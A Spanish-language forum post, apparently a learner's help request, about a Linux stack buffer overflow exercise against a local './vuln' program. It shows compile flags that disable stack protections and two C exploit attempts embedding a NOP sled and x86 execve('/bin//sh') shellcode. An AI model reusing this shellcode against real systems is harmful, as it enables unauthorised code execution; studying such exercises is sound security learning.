Bueno, de acuerdo, ahora no da fallo de segm. pero no ejecuta nada...
juanra@Juanra:~/Escritorio/Shell$ gcc -o exploit exploit.c -z execstack --no-stack-protector
juanra@Juanra:~/Escritorio/Shell$ ./exploit
First BoF Linux attack : Sagrini 2010 : elhacker.net
juanra@Juanra:~/Escritorio/Shell$
Vale, ahora qué, si fuese porque cambia la dirección de memoria me diriía fallo de segmentación, pero nada...
Una cosa, si le meto un byte nulo, no se rellena todo... No va... Voy a probar otra cosa...
--------------------------------------------------------------------------------------------------------------------------------------------------------
Modf: Pruebo con este code:
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
int main ()
{
printf ("First BoF Linux attack : Sagrini 2010 : elhacker.net\n");
char command [] = "./vuln \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x18\x1f\x9b\xbf";
return 0;
}
y este
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
int main ()
{
printf ("First BoF Linux attack : Sagrini 2010 : elhacker.net\n");
char command [] = "./vuln \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x18\x1f\x9b\xbf";
char *cmd[] = {command, NULL};
execve ("./vuln", cmd, NULL);
return 0;
}
En el primero, "Segmentation Fault". En el segundo no printea nada menos la primera frase.
¿Qué hago?